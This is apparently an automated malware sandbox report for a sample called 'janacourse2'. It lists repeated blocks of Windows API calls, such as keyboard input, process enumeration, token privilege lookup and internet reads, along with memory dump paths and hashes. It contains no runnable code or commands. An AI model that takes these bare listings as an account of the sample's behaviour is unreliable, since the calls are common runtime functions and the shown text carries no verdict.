                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$socket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1881357543-0
                                                                                                            • Opcode ID: 3057b747991c559f7e92ef982296823cd0dad03e82254b7de8495265eca71bbc
                                                                                                            • Instruction ID: 150e860d5e72b01577d05994718fd33d395a1b71a1b93c2a08d58427169ce829
                                                                                                            • Opcode Fuzzy Hash: 3057b747991c559f7e92ef982296823cd0dad03e82254b7de8495265eca71bbc
                                                                                                            • Instruction Fuzzy Hash: B141B574600200AFE724EF24C986F6A77E5AB88718F54848CF6569F3C2D776DD428B90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d93ad44a00cf5539fd30b2c3f9cfd030b211995acee0815873480672aa63fb45
                                                                                                            • Instruction ID: 7364e56d005ffaf384055906ff64f347bdaeb8e2101a459b7825833e21f6520e
                                                                                                            • Opcode Fuzzy Hash: d93ad44a00cf5539fd30b2c3f9cfd030b211995acee0815873480672aa63fb45
                                                                                                            • Instruction Fuzzy Hash: 80410872A00344AFD724DF79CC41B6BBBA9EF84720F10466EF541DB2D1D775A9019790
                                                                                                            APIs
                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 01025783
                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 010257A9
                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 010257CE
                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 010257FA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3321077145-0
                                                                                                            • Opcode ID: b2c2fe7d306032fbbacdbe490bcf3fcd43035e25270ebb8f84b8e529418cd1ec
                                                                                                            • Instruction ID: 9388bbfd40493786cf662a955bffa6ce2745bf589e8e4cc557b9087d86a1b93b
                                                                                                            • Opcode Fuzzy Hash: b2c2fe7d306032fbbacdbe490bcf3fcd43035e25270ebb8f84b8e529418cd1ec
                                                                                                            • Instruction Fuzzy Hash: 8A412E39600610DFCB21EF15C945A9EBBE1AF89310B18C488E84A6B366CB79FD01DF91
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00FD6D71,00000000,00000000,00FD82D9,?,00FD82D9,?,00000001,00FD6D71,8BE85006,00000001,00FD82D9,00FD82D9), ref: 00FED910
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FED999
                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00FED9AB
                                                                                                            • __freea.LIBCMT ref: 00FED9B4
                                                                                                              • Part of subcall function 00FE3820: RtlAllocateHeap.NTDLL(00000000,?,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6,?,00FB1129), ref: 00FE3852
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                            • String ID:
                                                                                                            • API String ID: 2652629310-0
                                                                                                            • Opcode ID: 94a991a642e6b2a7ec06daf26045c92a129bdf94cddb13c5340356f2284f0cec
                                                                                                            • Instruction ID: 5a49a558e5e386194533a3d4bee53ca792c7ae9909a4cd243a28b9fbb5aa74e6
                                                                                                            • Opcode Fuzzy Hash: 94a991a642e6b2a7ec06daf26045c92a129bdf94cddb13c5340356f2284f0cec
                                                                                                            • Instruction Fuzzy Hash: 8631E172A0124AABDF24DF66DC85EAE7BA5EF41320F050169FC04D7251EB39DD50EBA0
                                                                                                            APIs
                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0101AAAC
                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0101AAC8
                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0101AB36
                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0101AB88
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 432972143-0
                                                                                                            • Opcode ID: 9a8f4b4976fe5ca8ede02cf6095f2f095b7cd8c89de47958ad8f4e176aa0a642
                                                                                                            • Instruction ID: 82438d705b732f435273dc3054cb474003931344b6ca6c1555761d189d8c25cc
                                                                                                            • Opcode Fuzzy Hash: 9a8f4b4976fe5ca8ede02cf6095f2f095b7cd8c89de47958ad8f4e176aa0a642
                                                                                                            • Instruction Fuzzy Hash: 2E310470B422C8EEFF318A688884BFA7BE6BB44310F04465AE1C1531DAD37D85818761
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 01045352
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01045375
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01045382
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010453A8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3340791633-0
                                                                                                            • Opcode ID: b62bbd4c9339bcee74e31be0631084274277284ad173aa5ac2b4492d56eec3e6
                                                                                                            • Instruction ID: eb94f9d90c45010c303c50ba52f27824ef2cc4015f6907e0ef1d25c05e9278b1
                                                                                                            • Opcode Fuzzy Hash: b62bbd4c9339bcee74e31be0631084274277284ad173aa5ac2b4492d56eec3e6
                                                                                                            • Instruction Fuzzy Hash: FA31C2B4A55208FFFB749E18CCC5BE83BE5AB05352F48C1A1FAD0961D1C7B5A980DB42
                                                                                                            APIs
                                                                                                            • ClientToScreen.USER32(?,?), ref: 0104769A
                                                                                                            • GetWindowRect.USER32(?,?), ref: 01047710
                                                                                                            • PtInRect.USER32(?,?,01048B89), ref: 01047720
                                                                                                            • MessageBeep.USER32(00000000), ref: 0104778C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1352109105-0
                                                                                                            • Opcode ID: 7cb9f41c74c48703214f24d77f69ddef017c759e480b77b2aa8737a93e4ad935
                                                                                                            • Instruction ID: fcb2ec6af474d8d1b0997b629d7b686f83147506a2630ba21a1bacf3804dc641
                                                                                                            • Opcode Fuzzy Hash: 7cb9f41c74c48703214f24d77f69ddef017c759e480b77b2aa8737a93e4ad935
                                                                                                            • Instruction Fuzzy Hash: 3041BCB8601215EFDB22CF58C5C4EAC7BF5BF48310F4540B8E9D49B255C336A942CB90
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32 ref: 010416EB
                                                                                                              • Part of subcall function 01013A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01013A57
                                                                                                              • Part of subcall function 01013A3D: GetCurrentThreadId.KERNEL32 ref: 01013A5E
                                                                                                              • Part of subcall function 01013A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010125B3), ref: 01013A65
                                                                                                            • GetCaretPos.USER32(?), ref: 010416FF
                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 0104174C
                                                                                                            • GetForegroundWindow.USER32 ref: 01041752
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2759813231-0
                                                                                                            • Opcode ID: 2037f74f3ad0f27b10ad1be95344ceb2ec61ed357ec6709c98d60c0a70662d5f
                                                                                                            • Instruction ID: 5606cfb086b00b146c7f6ed94655590b738e139d319286c86506e7e9c0568937
                                                                                                            • Opcode Fuzzy Hash: 2037f74f3ad0f27b10ad1be95344ceb2ec61ed357ec6709c98d60c0a70662d5f
                                                                                                            • Instruction Fuzzy Hash: CD313EB5D00249AFD700EFAAC9C18EEBBF9FF48204B5480AAE455E7201D7359E45CFA0
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0101D501
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0101D50F
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0101D52F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0101D5DC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 420147892-0
                                                                                                            • Opcode ID: 1a35eba3f589b5150bb042377674733b62abedd704515487e028b27a224da148
                                                                                                            • Instruction ID: 89fecb4b90579034d8db62ae748eb383cd3a83790058b4d3d1ea56d69c560e90
                                                                                                            • Opcode Fuzzy Hash: 1a35eba3f589b5150bb042377674733b62abedd704515487e028b27a224da148
                                                                                                            • Instruction Fuzzy Hash: 8B31BF711083009FD311EF94CC85AAFBBF8EF99354F14092DF6C1821A1EB799A48DB92
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
                                                                                                            • GetCursorPos.USER32(?), ref: 01049001
                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,01007711,?,?,?,?,?), ref: 01049016
                                                                                                            • GetCursorPos.USER32(?), ref: 0104905E
                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,01007711,?,?,?), ref: 01049094
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2864067406-0
                                                                                                            • Opcode ID: c0f1b46333ed426166830e1ca267e56dead5539b695b8f7461735db36284f235
                                                                                                            • Instruction ID: adaf7265b764cb6a8008fd9fddd03fb1add30408b0d6ec8a3ed4912f96f0528c
                                                                                                            • Opcode Fuzzy Hash: c0f1b46333ed426166830e1ca267e56dead5539b695b8f7461735db36284f235
                                                                                                            • Instruction Fuzzy Hash: 04219C75601018AFEB25DF98C889EEF3BB9EF89350F0040B9FA8547251C7369990DB60
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNEL32(?,0104CB68), ref: 0101D2FB
                                                                                                            • GetLastError.KERNEL32 ref: 0101D30A
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0101D319
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0104CB68), ref: 0101D376
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 2267087916-0
                                                                                                            • Opcode ID: 957467fca28ded74a9180eee71b82353d7e2ffb8fb0c29123e37560ce07ec9fa
                                                                                                            • Instruction ID: b93667d6e3b2e1bd46ebc088e74a48e2f9ed4c8bafa1f0fc8c31d34f093bbfbb
                                                                                                            • Opcode Fuzzy Hash: 957467fca28ded74a9180eee71b82353d7e2ffb8fb0c29123e37560ce07ec9fa
                                                                                                            • Instruction Fuzzy Hash: 5321E2745093019F9310DF69CA848AE7BE8EF46328F108A5DF4D9C72A5DB39D906CF92
                                                                                                            APIs
                                                                                                              • Part of subcall function 01011014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0101102A
                                                                                                              • Part of subcall function 01011014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01011036
                                                                                                              • Part of subcall function 01011014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01011045
                                                                                                              • Part of subcall function 01011014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0101104C
                                                                                                              • Part of subcall function 01011014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01011062
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 010115BE
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 010115E1
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01011617
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0101161E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1592001646-0
                                                                                                            • Opcode ID: a212f10f25efe7f12defa05f8b3d16c20959f739b69047da569d19af422ade64
                                                                                                            • Instruction ID: 5cb2f9a44c707dfe54f58c2efb17cf9c7e063f85f212fa5e39b0436ed092f43a
                                                                                                            • Opcode Fuzzy Hash: a212f10f25efe7f12defa05f8b3d16c20959f739b69047da569d19af422ade64
                                                                                                            • Instruction Fuzzy Hash: 46218E71E01109EFDB14CFA8CA44BEEBBF8EF44354F084899E681A7244D739AA05CB50
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0104280A
                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01042824
                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01042832
                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01042840
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                            • String ID:
                                                                                                            • API String ID: 2169480361-0
                                                                                                            • Opcode ID: 245ecbde02268879735c5506111a3e8190b54be2158dd5c629d6fe4259fdad63
                                                                                                            • Instruction ID: 58e8991702c93cec98a820a96cde8684f3b993a2571a995deb592f9085b75e9d
                                                                                                            • Opcode Fuzzy Hash: 245ecbde02268879735c5506111a3e8190b54be2158dd5c629d6fe4259fdad63
                                                                                                            • Instruction Fuzzy Hash: A321F475305111AFE714DB24D884FAA7B95AF45324F1481A8F4568B6D2C775EC82CBD0
                                                                                                            APIs
                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 0102CE89
                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0102CEEA
                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 0102CEFE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 234945975-0
                                                                                                            • Opcode ID: 79a352e2c134d5483603dff63958b8d209855d3a566b0b8c0e5994b8183d4f70
                                                                                                            • Instruction ID: cc9414fad9814a1771411ae931ea3d106ddf88c4f405c1849994d0ffa752215a
                                                                                                            • Opcode Fuzzy Hash: 79a352e2c134d5483603dff63958b8d209855d3a566b0b8c0e5994b8183d4f70
                                                                                                            • Instruction Fuzzy Hash: C421C1B15007159BFB70DF69CB84BABBBFCEB40358F10445EE686D2141E775EA048B50
                                                                                                            APIs
                                                                                                              • Part of subcall function 01018D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0101790A,?,000000FF,?,01018754,00000000,?,0000001C,?,?), ref: 01018D8C
                                                                                                              • Part of subcall function 01018D7D: lstrcpyW.KERNEL32(00000000,?,?,0101790A,?,000000FF,?,01018754,00000000,?,0000001C,?,?,00000000), ref: 01018DB2
                                                                                                              • Part of subcall function 01018D7D: lstrcmpiW.KERNEL32(00000000,?,0101790A,?,000000FF,?,01018754,00000000,?,0000001C,?,?), ref: 01018DE3
                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,01018754,00000000,?,0000001C,?,?,00000000), ref: 01017923
                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,01018754,00000000,?,0000001C,?,?,00000000), ref: 01017949
                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,01018754,00000000,?,0000001C,?,?,00000000), ref: 01017984
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
